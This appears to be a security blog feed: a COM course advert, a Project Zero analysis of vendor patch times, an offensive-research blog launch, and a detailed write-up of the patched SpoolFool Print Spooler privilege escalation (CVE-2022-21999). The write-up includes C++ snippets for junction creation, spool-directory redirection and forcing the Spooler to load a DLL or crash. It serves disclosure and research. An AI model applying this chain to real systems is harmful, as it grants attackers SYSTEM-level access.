What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of this class. In case you have doubts, talk to me.

Participants in my Windows Internals and Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Previous students in my classes get 10% off. Multiple participants from the same company get a discount (email me for the details).

To register, send an email to [email protected] with the title “COM Training”, and write the name(s), email(s) and time zone(s) of the participants.


zodiacon

A walk through Project Zero metrics

By: Ryan
10 February 2022 at 16:58

Posted by Ryan Schoen, Project Zero

tl;dr

  • In 2021, vendors took an average of 52 days to fix security vulnerabilities reported from Project Zero. This is a significant acceleration from an average of about 80 days 3 years ago.
  • In addition to the average now being well below the 90-day deadline, we have also seen a dropoff in vendors missing the deadline (or the additional 14-day grace period). In 2021, only one bug exceeded its fix deadline, though 14% of bugs required the grace period.
  • Differences in the amount of time it takes a vendor/product to ship a fix to users reflects their product design, development practices, update cadence, and general processes towards security reports. We hope that this comparison can showcase best practices, and encourage vendors to experiment with new policies.
  • This data aggregation and analysis is relatively new for Project Zero, but we hope to do it more in the future. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities, as well as more data sharing and transparency in general.

Overview

For nearly ten years, Google’s Project Zero has been working to make it more difficult for bad actors to find and exploit security vulnerabilities, significantly improving the security of the Internet for everyone. In that time, we have partnered with folks across industry to transform the way organizations prioritize and approach fixing security vulnerabilities and updating people’s software.

To help contextualize the shifts we are seeing the ecosystem make, we looked back at the set of vulnerabilities Project Zero has been reporting, how a range of vendors have been responding to them, and then attempted to identify trends in this data, such as how the industry as a whole is patching vulnerabilities faster.

For this post, we look at fixed bugs that were reported between January 2019 and December 2021 (2019 is the year we made changes to our disclosure policies and also began recording more detailed metrics on our reported bugs). The data we'll be referencing is publicly available on the Project Zero Bug Tracker, and on various open source project repositories (in the case of the data used below to track the timeline of open-source browser bugs).

There are a number of caveats with our data, the largest being that we'll be looking at a small number of samples, so differences in numbers may or may not be statistically significant. Also, the direction of Project Zero's research is almost entirely influenced by the choices of individual researchers, so changes in our research targets could shift metrics as much as changes in vendor behaviors could. As much as possible, this post is designed to be an objective presentation of the data, with additional subjective analysis included at the end.

The data!

Between 2019 and 2021, Project Zero reported 376 issues to vendors under our standard 90-day deadline. 351 (93.4%) of these bugs have been fixed, while 14 (3.7%) have been marked as WontFix by the vendors. 11 (2.9%) other bugs remain unfixed, though at the time of this writing 8 have passed their deadline to be fixed; the remaining 3 are still within their deadline to be fixed. Most of the vulnerabilities are clustered around a few vendors, with 96 bugs (26%) being reported to Microsoft, 85 (23%) to Apple, and 60 (16%) to Google.

Deadline adherence

Once a vendor receives a bug report under our standard deadline, they have 90 days to fix it and ship a patched version to the public. The vendor can also request a 14-day grace period if the vendor confirms they plan to release the fix by the end of that total 104-day window.

In this section, we'll be taking a look at how often vendors are able to hit these deadlines. The table below includes all bugs that have been reported to the vendor under the 90-day deadline since January 2019 and have since been fixed, for vendors with the most bug reports in the window.

Deadline adherence and fix time 2019-2021, by bug report volume

Vendor      Total bugs   Fixed by day 90   Fixed during grace period   Exceeded deadline & grace period   Avg days to fix
Apple       84           73 (87%)          7 (8%)                      4 (5%)                             69
Microsoft   80           61 (76%)          15 (19%)                    4 (5%)                             83
Google      56           53 (95%)          2 (4%)                      1 (2%)                             44
Linux       25           24 (96%)          0 (0%)                      1 (4%)                             25
Adobe       19           15 (79%)          4 (21%)                     0 (0%)                             65
Mozilla     10           9 (90%)           1 (10%)                     0 (0%)                             46
Samsung     10           8 (80%)           2 (20%)                     0 (0%)                             72
Oracle      7            3 (43%)           0 (0%)                      4 (57%)                            109
Others*     55           48 (87%)          3 (5%)                      4 (7%)                             44
TOTAL       346          294 (84%)         34 (10%)                    18 (5%)                            61

* For completeness, the vendors included in the "Others" bucket are Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Node.js, opencontainers, QT, Qualcomm, RedHat, Reliance, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

Overall, the data show that almost all of the big vendors here are coming in under 90 days, on average. The bulk of fixes during a grace period come from Apple and Microsoft (22 out of 34 total).

Vendors have exceeded the deadline and grace period about 5% of the time over this period. In this slice, Oracle has exceeded at the highest rate, but admittedly with a relatively small sample size of only about 7 bugs. The next-highest rate is Microsoft, having exceeded 4 of their 80 deadlines.

Average number of days to fix bugs across all vendors is 61 days. Zooming in on just that stat, we can break it out by year:

Bug fix time 2019-2021, by bug report volume

Vendor      Bugs in 2019 (avg days to fix)   Bugs in 2020 (avg days to fix)   Bugs in 2021 (avg days to fix)
Apple       61 (71)                          13 (63)                          11 (64)
Microsoft   46 (85)                          18 (87)                          16 (76)
Google      26 (49)                          13 (22)                          17 (53)
Linux       12 (32)                          8 (22)                           5 (15)
Others*     54 (63)                          35 (54)                          14 (29)
TOTAL       199 (67)                         87 (54)                          63 (52)

* For completeness, the vendors included in the "Others" bucket are Adobe, Apache, ASWF, Avast, AWS, c-ares, Canonical, F5, Facebook, git, Github, glibc, gnupg, gnutls, gstreamer, haproxy, Hashicorp, insidesecure, Intel, Kubernetes, libseccomp, libx264, Logmein, Mozilla, Node.js, opencontainers, Oracle, QT, Qualcomm, RedHat, Reliance, Samsung, SCTPLabs, Signal, systemd, Tencent, Tor, udisks, usrsctp, Vandyke, VietTel, webrtc, and Zoom.

From this, we can see a few things: first of all, the overall time to fix has consistently been decreasing, but most significantly between 2019 and 2020. Microsoft, Apple, and Linux have all reduced their time to fix over the period, whereas Google sped up in 2020 before slowing down again in 2021. Perhaps most impressively, the vendors not represented on the chart have collectively cut their time to fix by more than half, though it's possible this represents a change in research targets rather than a change in practices for any particular vendor.

Finally, focusing on just 2021, we see:

  • Only 1 deadline exceeded, versus an average of 9 per year in the other two years
  • The grace period used 9 times (notably with half being by Microsoft), versus the slightly lower average of 12.5 in the other years

Mobile phones

Since the products in the previous table span a range of types (desktop operating systems, mobile operating systems, browsers), we can also focus on a particular, hopefully more apples-to-apples comparison: mobile phone operating systems.

Vendor              Total bugs   Avg fix time
iOS                 76           70
Android (Samsung)   10           72
Android (Pixel)     6            72

The first thing to note is that it appears that iOS received remarkably more bug reports from Project Zero than any flavor of Android did during this time period, but rather than an imbalance in research target selection, this is more a reflection of how Apple ships software. Security updates for "apps" such as iMessage, Facetime, and Safari/WebKit are all shipped as part of the OS updates, so we include those in the analysis of the operating system. On the other hand, security updates for standalone apps on Android happen through the Google Play Store, so they are not included here in this analysis.

Despite that, all three vendors have an extraordinarily similar average time to fix. With the data we have available, it's hard to determine how much time is spent on each part of the vulnerability lifecycle (e.g. triage, patch authoring, testing, etc). However, open-source products do provide a window into where time is spent.

Browsers

For most software, we aren't able to dig into specifics of the timeline. Specifically: after a vendor receives a report of a security issue, how much of the "time to fix" is spent between the bug report and landing the fix, and how much time is spent between landing that fix and releasing a build with the fix? The one window we do have is into open-source software, and specific to the type of vulnerability research that Project Zero does, open-source browsers.

Fix time analysis for open-source browsers, by bug volume

Browser   Bugs   Avg days from bug report to public patch   Avg days from public patch to release   Avg days from bug report to release
Chrome    40     5.3                                        24.6                                    29.9
WebKit    27     11.6                                       61.1                                    72.7
Firefox   8      16.6                                       21.1                                    37.8
Total     75     8.8                                        37.3                                    46.1

We can also take a look at the same data, but with each bug spread out in a histogram. In particular, the histogram of the amount of time from a fix being landed in public to that fix being shipped to users shows a clear story (in the table above, this corresponds to the "Avg days from public patch to release" column):

Histogram showing the distributions of time from a fix landing in public to a fix shipping for Firefox, Webkit, and Chrome. The fact that Webkit is still on the higher end of the histogram tells us that most of their time is spent shipping the fixed build after the fix has landed.

The table and chart together tell us a few things:

Chrome is currently the fastest of the three browsers, going from bug report to a fix released in the stable channel in an average of 30 days. The time to patch is very fast here, with just an average of 5 days between the bug report and the patch landing in public. The time for that patch to be released to the public makes up the bulk of the overall window, though we still see the Chrome (blue) bars toward the left side of the histogram. (Important note: despite being housed within the same company, Project Zero follows the same policies and procedures with Chrome that an external security researcher would follow. More information on that is available in our Vulnerability Disclosure FAQ.)

Firefox comes in second in this analysis, though with a relatively small number of data points to analyze. Firefox releases a fix on average in 38 days. A little under half of that is time for the fix to land in public, though it's important to note that Firefox intentionally delays committing security patches to reduce the amount of exposure before the fix is released. Once the patch has been made public, it releases the fixed build on average a few days faster than Chrome – with the vast majority of the fixes shipping 10-15 days after their public patch.

WebKit is the outlier in this analysis, with the longest time from report to release at 73 days. Their time to land the fix publicly is in the middle between Chrome and Firefox, but unfortunately this leaves a very long window for opportunistic attackers to find the patch and exploit it before the fix is made available to users. This can be seen in the Apple (red) bars of the second histogram, which mostly sit on the right side of the graph, with all but one past the 30-day mark.

Analysis, hopes, and dreams

Overall, we see a number of promising trends emerging from the data. Vendors are fixing almost all of the bugs that they receive, and they generally do it within the 90-day deadline plus the 14-day grace period when needed. Over the past three years vendors have, for the most part, accelerated their patching, effectively reducing the overall average time to fix to about 52 days. In 2021, there was only one 90-day deadline exceeded. We suspect that this trend may be due to the fact that responsible disclosure policies have become the de-facto standard in the industry, and vendors are more equipped to react rapidly to reports with differing deadlines. We also suspect that vendors have learned best practices from each other, as there has been increasing transparency in the industry.

One important caveat: we are aware that reports from Project Zero may be outliers compared to other bug reports, in that they may receive faster action as there is a tangible risk of public disclosure (as the team will disclose if deadline conditions are not met) and Project Zero is a trusted source of reliable bug reports. We encourage vendors to release metrics, even if they are high level, to give a better overall picture of how quickly security issues are being fixed across the industry, and continue to encourage other security researchers to share their experiences.

For Google, and in particular Chrome, we suspect that the quick turnaround time on security bugs is in part due to their rapid release cycle, as well as their additional stable releases for security updates. We're encouraged by Chrome's recent switch from a 6-week release cycle to a 4-week release cycle. On the Android side, we see the Pixel variant of Android releasing fixes about on par with the Samsung variants as well as iOS. Even so, we encourage the Android team to look for additional ways to speed up the application of security updates and push that segment of the industry further.

For Apple, we're pleased with the acceleration of patches landing, as well as the recent lack of use of grace periods as well as lack of missed deadlines. For WebKit in particular, we hope to see a reduction in the amount of time it takes between landing a patch and shipping it out to users, especially since WebKit security affects all browsers used in iOS, as WebKit is the only browser engine permitted on the iOS platform.

For Microsoft, we suspect that the high time to fix and Microsoft's reliance on the grace period are consequences of the monthly cadence of Microsoft's "patch Tuesday" updates, which can make it more difficult for development teams to meet a disclosure deadline. We hope that Microsoft might consider implementing a more frequent patch cadence for security issues, or finding ways to further streamline their internal processes to land and ship code quicker.

Moving forward

This post represents some number-crunching we've done of our own public data, and we hope to continue this going forward. Now that we've established a baseline over the past few years, we plan to continue to publish an annual update to better understand how the trends progress.

To that end, we'd love to have even more insight into the processes and timelines of our vendors. We encourage all vendors to consider publishing aggregate data on their time-to-fix and time-to-patch for externally reported vulnerabilities. Through more transparency, information sharing, and collaboration across the industry, we believe we can learn from each other's best practices, better understand existing difficulties and hopefully make the internet a safer place for all.

First!

8 February 2022 at 17:38

Today we are launching the IFCR research blog. The ambition is to provide original research and new technical ideas and approaches to the offensive security community.

New material will be added occasionally and not by a defined schedule. That being said, we’ve already got quite a few interesting posts lined-up.

Stay tuned for more…!

The IFCR Offensive Ops Team


First! was originally published in IFCR on Medium, where people are continuing the conversation by highlighting and responding to this story.

SpoolFool: Windows Print Spooler Privilege Escalation (CVE-2022-21999)

8 February 2022 at 20:21

UPDATE (Feb 9, 2022): Microsoft initially patched this vulnerability without giving me any information or acknowledgement, and as such, at the time of patch release, I thought that the vulnerability was identified as CVE-2022–22718, since it was the only Print Spooler vulnerability in the release without any acknowledgement. I contacted Microsoft for clarification, and the day after the patch release, Institut For Cyber Risk and I were acknowledged for CVE-2022–21999.

In this blog post, we’ll look at a Windows Print Spooler local privilege escalation vulnerability that I found and reported in November 2021. The vulnerability got patched as part of Microsoft’s Patch Tuesday in February 2022. We’ll take a quick tour of the components and inner workings of the Print Spooler, and then we’ll dive into the vulnerability with root cause, code snippets, images and much more. At the end of the blog post, you can also find a link to a functional exploit.

Background

Back in May 2020, Microsoft patched a Windows Print Spooler privilege escalation vulnerability. The vulnerability was assigned CVE-2020-1048, and Microsoft acknowledged Peleg Hadar and Tomer Bar of SafeBreach Labs for reporting the security issue. On the same day of the patch release, Yarden Shafir and Alex Ionescu published a technical write-up of the vulnerability. In essence, a user could write to an arbitrary file by creating a printer port that pointed to a file on disk. After the vulnerability (CVE-2020-1048) had been patched, the Print Spooler would now check if the user had permissions to create or write to the file before adding the port. A week after the release of the patch and blog post, Paolo Stagno (aka VoidSec) privately disclosed a bypass for CVE-2020-1048 to Microsoft. The bypass was patched three months later in August 2020, and Microsoft acknowledged eight independent entities for reporting the vulnerability, which was identified as CVE-2020-1337. The bypass used a directory junction (a type of reparse point) to circumvent the security check. Suppose a user created the directory C:\MyFolder\ and configured a printer port to point to the file C:\MyFolder\Port. This operation would be granted, since the user is indeed allowed to create C:\MyFolder\Port. Now, what would happen if the user then turned C:\MyFolder\ into a directory junction that pointed to C:\Windows\System32\ after the port had been created? Well, the Spooler would simply write to the file C:\Windows\System32\Port.
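For context, the CVE-2020-1048 primitive boils down to a single call into the port management API. Below is a minimal sketch of the idea (my own illustration of the well-known XcvData "AddPort" pattern, not the original exploit code):

#include <windows.h>
#include <winspool.h>
#include <cwchar>
#pragma comment(lib, "winspool.lib")

// Exported by winspool.drv; redeclared here in case the SDK headers lack it.
extern "C" BOOL WINAPI XcvDataW(HANDLE, PCWSTR, PBYTE, DWORD, PBYTE, DWORD,
                                PDWORD, PDWORD);

// Sketch of the pre-patch primitive: add a printer port that is really a file.
bool AddFilePort(PCWSTR portPath) // e.g. L"C:\\MyFolder\\Port"
{
    PRINTER_DEFAULTSW defaults = { nullptr, nullptr, SERVER_ACCESS_ADMINISTER };
    HANDLE hXcv = nullptr;

    // ",XcvMonitor Local Port" addresses the local port monitor directly.
    if (!OpenPrinterW(const_cast<PWSTR>(L",XcvMonitor Local Port"), &hXcv, &defaults))
        return false;

    DWORD needed = 0, status = 0;
    BOOL ok = XcvDataW(hXcv, L"AddPort", (PBYTE)portPath,
                       (DWORD)((wcslen(portPath) + 1) * sizeof(WCHAR)),
                       nullptr, 0, &needed, &status);
    ClosePrinter(hXcv);
    return ok && status == ERROR_SUCCESS;
}

After the CVE-2020-1048 patch, the same call fails unless the caller can actually write to the target path, which is exactly the check the junction trick sidesteps.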

These two vulnerabilities, CVE-2020-1048 and CVE-2020-1337, were patched in May and August 2020, respectively. In September 2020, Microsoft patched a different vulnerability in the Print Spooler. In short, this vulnerability allowed users to create arbitrary and writable directories by configuring the SpoolDirectory attribute on a printer. What was the patch? Almost the same story: After the patch, the Print Spooler would now check if the user had permissions to create the directory before setting the SpoolDirectory property on a printer. Perhaps you can already see where this post is going. Let's start at the beginning.

Introduction to Spooler Components

The Windows Print Spooler is a built-in component on all Windows workstations and servers, and it is the primary component of the printing interface. The Print Spooler is an executable file that manages the printing process. Management of printing involves retrieving the location of the correct printer driver, loading that driver, spooling high-level function calls into a print job, scheduling the print job for printing, and so on. The Spooler is loaded at system startup and continues to run until the operating system is shut down. The primary components of the Print Spooler are illustrated in the following diagram.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-spooler-components

Application

The print application creates a print job by calling Graphics Device Interface (GDI) functions or directly into winspool.drv.

GDI

The Graphics Device Interface (GDI) includes both user-mode and kernel-mode components for graphics support.

winspool.drv

winspool.drv is the client interface into the Spooler. It exports the functions that make up the Spooler’s Win32 API, and provides RPC stubs for accessing the server.

spoolsv.exe

spoolsv.exe is the Spooler’s API server. It is implemented as a service that is started when the operating system is started. This module exports an RPC interface to the server side of the Spooler’s Win32 API. Clients of spoolsv.exe include winspool.drv (locally) and win32spl.dll (remotely). The module implements some API functions, but most function calls are passed to a print provider by means of the router (spoolss.dll).

Router

The router, spoolss.dll, determines which print provider to call, based on a printer name or handle supplied with each function call, and passes the function call to the correct provider.

Print Provider

The print provider that supports the specified print device.

Local Print Provider

The local print provider provides job control and printer management capabilities for all printers that are accessed through the local print provider’s port monitors.

The following diagram provides a view of control flow among the local printer provider’s components, when an application creates a print job.

https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-print-providers

While this control flow is rather large, we will mostly focus on the local print provider localspl.dll.

Vulnerability

The vulnerability consists of two bypasses for CVE-2020-1030. I highly recommend reading Victor Mata's blog post on CVE-2020-1030, but I'll try to cover the important parts as well.

When a user prints a document, a print job is spooled to a predefined location referred to as the “spool directory”. The spool directory is configurable on each printer and it must allow the FILE_ADD_FILE permission to all users.

Permissions of the default spool directory

Individual spool directories are supported by defining the SpoolDirectory value in a printer’s registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\<printer>.

The Print Spooler provides APIs for managing configuration data such as EnumPrinterData, GetPrinterData, SetPrinterData, and DeletePrinterData. Underneath, these functions perform registry operations relative to the printer’s key.

We can modify a printer’s configuration with SetPrinterDataEx. This function requires a printer to be opened with the PRINTER_ACCESS_ADMINISTER access right. If the current user doesn’t have permission to open an existing printer with the PRINTER_ACCESS_ADMINISTER access right, there are two options:

  • The user can create a new local printer
  • The user can add a remote printer

By default, users in the INTERACTIVE group have the “Manage Server” permission and can therefore create new local printers, as shown below.

Security of the local print server on Windows desktops

However, it seems that this permission is only granted on Windows desktops, such as Windows 10 and Windows 11. During my testing on Windows servers, this permission was not present. Nonetheless, it was still possible for users without the “Manage Server” permission to add remote printers.

If a user adds a remote printer, the printer will inherit the security properties of the shared printer from the printer server. As such, if the remote printer server allows Everyone to manage the printer, then it's possible to obtain a handle to the printer with the PRINTER_ACCESS_ADMINISTER access right, and SetPrinterDataEx would update the local registry as usual. A user could therefore create a shared printer on a different server or workstation, and grant Everyone the right to manage the printer. On the victim server, the user could then add the remote printer, which would now be manageable by Everyone. While I haven't fully tested how this vulnerability behaves on remote printers, it could be a viable option for situations where the user cannot create or manage a local printer. But please note that while some operations are handled by the local print provider, others are handled by the remote print provider.

When we have opened or created a printer with the PRINTER_ACCESS_ADMINISTER access right, we can configure the SpoolDirectory on it.
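As a rough sketch of this step (printer name and directory are placeholders; I'm using a single-backslash key name here, which places the value directly under the printer's registry key — see the exploit repository linked at the end of the post for the authoritative call):

#include <windows.h>
#include <winspool.h>
#include <cwchar>
#pragma comment(lib, "winspool.lib")

// Sketch: point a printer's SpoolDirectory at a directory we control.
bool SetSpoolDirectory(PCWSTR printerName, PCWSTR spoolDir)
{
    PRINTER_DEFAULTSW defaults = { nullptr, nullptr, PRINTER_ACCESS_ADMINISTER };
    HANDLE hPrinter = nullptr;

    if (!OpenPrinterW(const_cast<PWSTR>(printerName), &hPrinter, &defaults))
        return false;

    DWORD err = SetPrinterDataExW(hPrinter, L"\\", L"SpoolDirectory", REG_SZ,
                                  (PBYTE)spoolDir,
                                  (DWORD)((wcslen(spoolDir) + 1) * sizeof(WCHAR)));
    ClosePrinter(hPrinter);
    return err == ERROR_SUCCESS;
}

Note that the new value only takes effect once the Spooler reinitializes, as described below.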

When calling SetPrinterDataEx, an RPC request will be sent to the local Print Spooler spoolsv.exe, which will route the request to the local print provider’s implementation in localspl.dll!SplSetPrinterDataEx. The control flow consists of the following events:

  • 1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  • 2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue

In the case of setting the SpoolDirectory value, localspl.dll!SplSetPrinterDataEx will verify that the provided directory is valid before updating the registry key. This check was not present before CVE-2020-1030.

localspl.dll!SplSetPrinterDataEx

Given a path to a directory, localspl.dll!IsValidSpoolDirectory will call localspl.dll!AdjustFileName to convert the path into a canonical path. For instance, the canonical path for C:\spooldir\ would be \\?\C:\spooldir\, and if C:\spooldir\ is a symbolic link to C:\Windows\System32\, the canonical path would be \\?\C:\Windows\System32\. Then, localspl.dll!IsValidSpoolDirectory will check if the current user is allowed to open or create the directory with GENERIC_WRITE access right. If the directory was successfully created or opened, the function will make a final check that the number of links to the directory is not greater than 1, as returned by GetFileInformationByHandle.

localspl.dll!IsValidSpoolDirectory

So in order to set the SpoolDirectory, the user must be able to create or open the directory with writable permissions. If the validation succeeds, the print provider will update the printer’s SpoolDirectory registry key. However, the spool directory will not be created by the Print Spooler until it has been reinitialized. This means that we will need to figure out how to restart the Spooler service (we will come back to this part), but it also means that the user only needs to be able to create the directory during the validation when setting the SpoolDirectory registry key — and not when the directory is actually created.

In order to bypass the validation, we can use reparse points (directory junctions in this case). Suppose we create a directory named C:\spooldir\, and we set the SpoolDirectory to C:\spooldir\printers\. The Spooler will check that the user can create the directory printers inside of C:\spooldir\. The validation passes, and the SpoolDirectory gets set to C:\spooldir\printers\. After we have configured the SpoolDirectory, we can convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\. When the Spooler initializes, the directory C:\Windows\System32\printers\ will be created with writable permissions for everyone. If the directory already exists, the Spooler will not set writable permissions on the folder.
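Creating the junction itself requires no special privileges. Here's a minimal sketch of turning an existing, empty directory into a mount point with FSCTL_SET_REPARSE_POINT (a standard technique, with error handling trimmed):

#include <windows.h>
#include <winioctl.h>
#include <cstring>
#include <string>
#include <vector>

// Mount-point reparse layout (normally only declared in the DDK headers).
typedef struct {
    ULONG  ReparseTag;
    USHORT ReparseDataLength;
    USHORT Reserved;
    USHORT SubstituteNameOffset;
    USHORT SubstituteNameLength;
    USHORT PrintNameOffset;
    USHORT PrintNameLength;
    WCHAR  PathBuffer[1];
} MOUNT_POINT_REPARSE;

// Turn an existing, empty directory into a junction pointing at `target`.
bool CreateJunction(const std::wstring& junctionDir, const std::wstring& target)
{
    std::wstring substitute = L"\\??\\" + target; // NT namespace form

    HANDLE hDir = CreateFileW(junctionDir.c_str(), GENERIC_WRITE, 0, nullptr,
                              OPEN_EXISTING,
                              FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT,
                              nullptr);
    if (hDir == INVALID_HANDLE_VALUE)
        return false;

    USHORT subBytes = (USHORT)(substitute.size() * sizeof(WCHAR));
    // 8 = the four USHORT name fields; plus two terminating WCHARs.
    USHORT dataLen = (USHORT)(8 + subBytes + 2 * sizeof(WCHAR));
    std::vector<BYTE> buf(8 + dataLen, 0); // 8 = tag + length + reserved

    auto* rp = reinterpret_cast<MOUNT_POINT_REPARSE*>(buf.data());
    rp->ReparseTag           = IO_REPARSE_TAG_MOUNT_POINT;
    rp->ReparseDataLength    = dataLen;
    rp->SubstituteNameOffset = 0;
    rp->SubstituteNameLength = subBytes;
    rp->PrintNameOffset      = (USHORT)(subBytes + sizeof(WCHAR)); // after the NUL
    rp->PrintNameLength      = 0;                                  // empty print name
    memcpy(rp->PathBuffer, substitute.c_str(), subBytes);

    DWORD ret = 0;
    BOOL ok = DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, buf.data(),
                              (DWORD)buf.size(), nullptr, 0, &ret, nullptr);
    CloseHandle(hDir);
    return ok != FALSE;
}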

As such, we need to find an interesting place to create a directory. One such place is C:\Windows\System32\spool\drivers\x64\, also known as the printer driver directory (the last path component differs on other architectures). The printer driver directory is particularly interesting, because if we call SetPrinterDataEx with the CopyFiles registry key, the Spooler will automatically load the DLL assigned in the Module value, provided the Module file path is allowed.

This event is triggered when pszKeyName begins with the CopyFiles\ string. It initiates a sequence of functions leading to LoadLibrary.

localspl.dll!SplSetPrinterDataEx

The control flow consists of the following events:

  • 1. spoolsv.exe!SetPrinterDataEx routes to SplSetPrinterDataEx in the local print provider localspl.dll
  • 2. localspl.dll!SplSetPrinterDataEx validates permissions before restoring SYSTEM context and modifying the registry via localspl.dll!SplRegSetValue
  • 3. localspl.dll!SplCopyFileEvent is called if pszKeyName argument begins with CopyFiles\ string
  • 4. localspl.dll!SplCopyFileEvent reads the Module value from printer’s CopyFiles registry key and passes the string to localspl.dll!SplLoadLibraryTheCopyFileModule
  • 5. localspl.dll!SplLoadLibraryTheCopyFileModule performs validation on the Module file path
  • 6. If validation passes, localspl.dll!SplLoadLibraryTheCopyFileModule attempts to load the module with LoadLibrary

The validation steps consist of localspl.dll!MakeCanonicalPath and localspl.dll!IsModuleFilePathAllowed. The function localspl.dll!MakeCanonicalPath will take a path and convert it into a canonical path, as described earlier.

localspl.dll!MakeCanonicalPath

localspl.dll!IsModuleFilePathAllowed will validate that the canonical path either resides directly inside of C:\Windows\System32\ or within the printer driver directory. For instance, C:\Windows\System32\payload.dll would be allowed, whereas C:\Windows\System32\Tasks\payload.dll would not. Any path inside of the printer driver directory is allowed, e.g. C:\Windows\System32\spool\drivers\x64\my\path\to\payload.dll is allowed. If we are able to create a DLL in C:\Windows\System32\ or anywhere in the printer driver directory, we can load the DLL into the Spooler service.

localspl.dll!SplLoadLibraryTheCopyFileModule
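From user mode, the trigger is just another SetPrinterDataEx call. A hedged sketch (the CopyFiles\Payload subkey name is arbitrary; per the description above, anything under CopyFiles\ fires the event):

#include <windows.h>
#include <winspool.h>
#include <cwchar>
#pragma comment(lib, "winspool.lib")

// Sketch: have the Spooler LoadLibrary() a path that passes
// IsModuleFilePathAllowed by writing it to the Module value.
bool LoadModuleIntoSpooler(HANDLE hPrinter, PCWSTR dllPath)
{
    DWORD err = SetPrinterDataExW(hPrinter, L"CopyFiles\\Payload", L"Module",
                                  REG_SZ, (PBYTE)dllPath,
                                  (DWORD)((wcslen(dllPath) + 1) * sizeof(WCHAR)));
    return err == ERROR_SUCCESS;
}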

Now, we know that we can use the SpoolDirectory to create an arbitrary directory with writable permissions for all users, and that we can load any DLL into the Spooler service that resides in either C:\Windows\System32\ or the printer driver directory. There is only one issue though. As mentioned earlier, the spool directory is created during the Spooler initialization. The spool directory is created when localspl.dll!SplCreateSpooler calls localspl.dll!BuildPrinterInfo. Before localspl.dll!BuildPrinterInfo allows Everybody the FILE_ADD_FILE permission, a final check is made to make sure that the directory path does not reside within the printer driver directory.

localspl.dll!BuildPrinterInfo

This means that a security check during the Spooler initialization verifies that the SpoolDirectory value does not point inside of the printer driver directory. If it does, the Spooler will not create the spool directory and simply fallback to the default spool directory. This security check was also implemented in the patch for CVE-2020-1030.

To summarize, in order to load the DLL with localspl.dll!SplLoadLibraryTheCopyFileModule, the DLL must reside inside of the printer driver directory or directly inside of C:\Windows\System32\. To create the writable directory during Spooler initialization, the directory must not reside inside of the printer driver directory. Both localspl.dll!SplLoadLibraryTheCopyFileModule and localspl.dll!BuildPrinterInfo check if the path points inside the printer driver directory. In the first case, we must make sure that the DLL path begins with C:\Windows\System32\spool\drivers\x64\, and in the second case, we must make sure that the directory path does not begin with C:\Windows\System32\spool\drivers\x64\.

During both checks, the SpoolDirectory is converted to a canonical path, so even if we set the SpoolDirectory to C:\spooldir\printers\ and then convert C:\spooldir\ into a reparse point that points to C:\Windows\System32\spool\drivers\x64\, the canonical path will still become \\?\C:\Windows\System32\spool\drivers\x64\printers\. The check is done by stripping off the first four characters (the \\?\ prefix) of the canonical path, i.e. \\?\C:\Windows\System32\spool\drivers\x64\printers\ becomes C:\Windows\System32\spool\drivers\x64\printers\, and then checking if the path begins with the printer driver directory C:\Windows\System32\spool\drivers\x64\. And so, here comes the second bug to pass both checks.

If we set the spooler directory to a UNC path, such as \\localhost\C$\spooldir\printers\ (and C:\spooldir\ is a reparse point to C:\Windows\System32\spool\drivers\x64\), the canonical path will become \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\, and during comparison, the first four bytes are stripped, so UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ is compared to C:\Windows\System32\spool\drivers\x64\ and will no longer match. When the Spooler initializes, the directory \\?\UNC\localhost\C$\Windows\System32\spool\drivers\x64\printers\ will be created with writable permissions. We can now write our DLL into C:\Windows\System32\spool\drivers\x64\printers\payload.dll. We can then trigger the localspl.dll!SplLoadLibraryTheCopyFileModule, but this time, we can just specify the path normally as C:\Windows\System32\spool\drivers\x64\printers\payload.dll.
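In code, the only change from the earlier hypothetical SetSpoolDirectory sketch is the value we write:

// Second bug: the UNC form canonicalizes to \\?\UNC\..., which no longer
// string-matches the C:\Windows\System32\spool\drivers\x64\ prefix check.
SetSpoolDirectory(L"Microsoft XPS Document Writer v4",
                  L"\\\\localhost\\C$\\spooldir\\printers");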

We now have the primitives to create a writable directory inside of the printer driver directory and to load a DLL within the driver directory into the Spooler service. The only thing left is to restart the Spooler service such that the directory will be created. We could wait for the server to be restarted, but there is a technique to terminate the service and rely on the recovery to restart it. By default, the Spooler service will restart on the first two “crashes”, but not on subsequent failures.

To terminate the service, we can use localspl.dll!SplLoadLibraryTheCopyFileModule to load C:\Windows\System32\AppVTerminator.dll. When loaded into Spooler, the library calls TerminateProcess which subsequently kills the spoolsv.exe process. This event triggers the recovery mechanism in the Service Control Manager which in turn starts a new Spooler process. This technique was explained for CVE-2020-1030 by Victor Mata from Accenture.
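With the hypothetical LoadModuleIntoSpooler helper from earlier, that restart gadget is a one-liner:

// Crash spoolsv.exe; the Service Control Manager restarts it, and the new
// instance creates our spool directory during initialization.
LoadModuleIntoSpooler(hPrinter, L"C:\\Windows\\System32\\AppVTerminator.dll");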

Here’s a full exploit in action. The DLL used in this example will create a new local administrator named “admin”. The DLL can also be found in the exploit repository.

SpoolFool in action

The steps for the exploit are the following:

  • Create a temporary base directory that will be used for our spool directory, which we’ll later turn into a reparse point
  • Create a new local printer named “Microsoft XPS Document Writer v4”
  • Set the spool directory of our new printer to be our temporary base directory
  • Create a reparse point on our temporary base directory to point to the printer driver directory
